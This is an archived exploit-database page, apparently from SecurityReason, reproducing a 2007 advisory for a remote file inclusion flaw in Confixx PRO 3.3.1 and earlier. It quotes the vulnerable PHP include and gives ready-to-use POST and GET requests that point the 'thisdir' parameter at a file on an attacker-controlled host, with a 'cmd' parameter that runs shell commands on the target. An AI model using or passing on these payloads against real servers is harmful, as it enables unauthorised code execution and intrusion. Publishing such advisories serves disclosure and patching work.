|
 |
| SecurityReason | ||
| WLB | ||
| Services | ||
| RSS | ||
| Corporate | ||
| Note | ||
If you have found a vulnerability, please send to our SecurityAlert Database : |
||
Home  ExploitAlert Database |
||
ExploitAlert : 2553 Credit : H4 / XPK Date : 24.07.2007 Exploit Code : [*] Confixx <= PRO 3.3.1 Remote File Inclusion Vulnerability __________________________________________________________________________ [!] Application homepage : http://www.swsoft.com/de/products/confixx/ [!] Author : H4 / XPK [!] Contact : http://xpkzxc.com/ [!] Bug discovered : 2007-07-21 [!] Bug published : 2007-07-24 [!] Risk : Moderate Do not forget visit our page for new vulnerabilites , information and tools. --------------------------------------------------------------------- Vuln. code: admin/business_inc/saveserver.php Lines 8-11 if( !in_array($returnto, $actions) ) { include( $thisdir . "/business_inc/list.php" ); } Variable $thisdir is not defined ... --------------------------------------------------------------------- An attacker does not need to be authenticated to access this file. [!] Conditions: open_basedir restriction off and allow_url_fopen = on [!] Exploitation : http://[target]/admin/business_inc/saveserver.php Post: thisdir=http://[yoursite]/images/1.jpg?&cmd=ls -la Get: saveserver.php?thisdir=http://[yoursite]/images/1.jpg?&cmd=ls -la ---------------------------------------------------------------------  Feedback : If you have additional information or notice any errors regarding this exploit, please use contact form or email us at exploit()securityreason()com. |
||
| Alert | ||
libc:fts_*() Multiple Denial of Service
The fts functions are provided for traversing UNIX file hierarchies... |
||
| Apache |  |
|
» Apache Tomcat 6.0.20 and |
||
» Apache Tomcat 6.0.20 and |
||
» Apache Tomcat 6.0.20 and |
||
| PHP | |
|
» PHP 5.2.12/5.3.1 |
||
- 2009-10-02| Copyright © SecurityReason.com. All Rights Reserved. |